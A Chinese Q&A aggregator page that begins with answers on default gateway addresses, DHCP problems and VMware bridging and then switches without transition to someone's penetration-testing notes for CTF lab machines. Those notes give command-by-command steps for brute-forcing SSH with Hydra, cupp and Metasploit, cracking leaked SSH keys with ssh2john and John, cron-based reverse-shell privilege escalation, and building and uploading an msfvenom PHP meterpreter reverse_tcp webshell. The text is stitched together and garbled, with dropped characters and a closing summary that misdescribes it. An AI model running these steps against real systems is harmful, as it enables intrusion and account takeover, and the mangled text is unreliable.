为什么默认网关地址有时候是本网络里第一个可用ip地址,而有时候是广...

为什么默认网关地址有时候是本网络里第一个可用ip地址,而有时候是广...,第1张

这个没有什么道理可讲,

假设你通过路由器向外访问,那么路由器的地址就是你的网关,而这个地址是手动设的,是1-254中的一个,但是不可能是255,那是广播地址不可用做网关,路由器设地址的时候都会设第一个1或者最后1个254,因为那样的话如果起DHCP,地址池就连续了,起1,地址池可以是2-254,起254地址池可以是1-253,如果你用中间的一个数字,那么地址池被打断,在做DHCP地址池的时候就要跳过这个数字,所以你看到的网关地址一般都是第一个或者最后1个,当然你用1-254中的任何一个都是可以,而且没什么区别,取决于设路由的时候你设了什么就是什么

这个就象1条路的一头的第一门派号码,总是会以1开始,但是如果你一定把第一个号码写成10,那也没什么不可

依据你描述,应该是电脑问题,路由上其他电脑能上,网线也证实是好的,都是自动获取的情况下无法获取正确IP地址。

坚持从软到硬的原则:检查该电脑系统,杀毒软件、防火墙工具、DHCP Client服务、网络协议、网卡驱动(品牌机讲究)之类的仔细耐心找下,不行把某些怀疑可能会影响的软件临时关闭甚至卸载。硬件的话:网卡,台式的话买个PCI的网卡换上试试~~我遇到过老机器出现过这类情况,换了张网卡就好了~

手动设置DNS,自动获取IP试试,我遇到过联想电脑出现过这样情况,设置下就行了~~

试试吧~

其实虚拟机都是通过主机的网卡来上网的,你查看一下你的虚拟机系统的ip地址,如果是和你主机的IP地址在同一个网段的那么这就是桥接,因为这两个系统同时向路由器申请IP的,如果不是那个就是NAT了,需要你设置一下你的虚拟网卡

本人笔记,仅供参考

相关靶机:

链接:>

提取码:qd32

渗透分析:

对于开启ssh服务的22端口的靶场优先考虑

1暴力破解

2私钥泄露

对于开放>

1通过浏览器访问对应靶场>

2使用探测工具对>

挖掘敏感信息:

使用浏览器对靶场IP的>

尤其对robotstxt、以及一些目录进行访问,挖掘具备利用价值的信息。对于开放ssh服务的靶场,务必要注意是否可以寻找到ssh私钥信息(id_ rsa);

对于某些靶场,也可以使用nikto扫描器来挖掘敏感信息;

-- nikto -host靶场IP地址

特别注意config等特殊敏感文件,要细读扫描的结果。挖掘可以利用的敏感信息;

登录服务器之后,我们需要做以下 *** 作。

1、查看当前用户whoami 

2、id 查看当前用户的权限

3、查看根目录寻找flag文件

如果是root权限,那么表明这个靶场就被全部拿下。但是如果不是,就肯定需要提权。一

般情况下,flag文件只属于root用户和对应的用户组:

cat /etc/passwd查看所有用户的列装

cat /etc/group查看用户组

find / -user用户名查看属于某些用户的文件

/tmp查看缓冲文件目录

深入挖掘

通过/etc/crontab文件,设定系统定期执行的任务,编辑,需要roor权限。不同的用户都可以有不同的定时任务

cat /etc/crontab挖掘其他用户是否有定时任务,并查看对应的任务内容。执行的任务肯定对应靶场机器的某个文件。

如果在/etc/crontab下有某个用户的定时计划文件,但是具体目录下没有这个定时执行的文件,可以自行创建反dshell,然后netcat执行监听获取对应用户的权限。

如果有定时执行的文件,可以切换到对应的目录,查看对应的权限,查看当前用户是否具有读写权限。

万不得已的时候只能对ssh服务进行暴力破解。破解最后一个

用户名。破解工具如hydra、medusa等;

利用cupp创建字典

git clone >

chmod +x cupppy

/cupppy -i以交互的方式创建字典

输入用户名然后一直回车到Do you want to add some random numbers at the end of words输入yes其他全部no此时创建完成

之后推荐用metasploit破解ssh

在终端中输入

msfconsole

msf > use auxiliary/scaner/ssh/ssh_ login(使用该模块)

set rhosts  19216856103(确定ip地址)

set username 用户名(破解的用户名)

set pass_ file 用户名txt(刚刚创建的字典)

set threads  5(输入线程)

Run(进攻)

此时破解出密码例如123

直接连接,如果出现问题可以重启msfconsole,启用该模块后

set rhosts 19216856103             (连接远程主机)

set username hadi(用户名)

Set password 123(密码)

Run

界面简陋就使用python优化界面

Python -c “import pty;ptyspawn(‘/bin/bash’)”(优化界面)

此时可以把自己权限提升到root:

su - root

回到根目录ls打开flag文件

Ssh秘钥泄露

解密Ssh秘钥信息(以秘钥名id_isa举例)

Chmod  600 id_isa(赋予is_isa可读可写权限)

ssh2john id_isa > isacrack       (就是用ssh2john把秘钥里的东西转换成john可识别的)

Zcat  /usr/share/wordlists/rockyoutxtgz | john --pipe --rules rsacracks(利用rockyou字典解出所需要的东西)

制作webshell

msfvenom -p php/meterpreter/reverse_tcp Ihost=攻击机IP地址Iport=4444 -f raw > /root/Desktop/shellphp

启动监听

msf > use exploit/multi/handler

msf exploit(handler) > set payload php/meterpreter/reverse_tcp

Weoshell

msf exploit(handler) > set Ihost攻击机IP地址

msf exploit(handler) > set lport 4444

msf exploit(handler)> run

上传Webshell

使用找到的敏感信息登录系统后台,上传webshell。 执行

webshel(访问具有webshell的php页面)

获得反d的shell

--

wordpress上传点theme 404php

执行: >

以上就是关于为什么默认网关地址有时候是本网络里第一个可用ip地址,而有时候是广...全部的内容,包括:为什么默认网关地址有时候是本网络里第一个可用ip地址,而有时候是广...、电脑老是获得169的IP段地址问题、Vmware桥接主机和虚拟机(自动获取ip)之间可以ping通,但虚拟机不能ping通网关。不知什么原因。等相关内容解答,如果想了解更多相关内容,可以关注我们,你们的支持是我们更新的动力!

欢迎分享,转载请注明来源:内存溢出

原文地址: http://outofmemory.cn/web/9545367.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2023-04-29
下一篇 2023-04-29

发表评论

登录后才能评论

评论列表(0条)

保存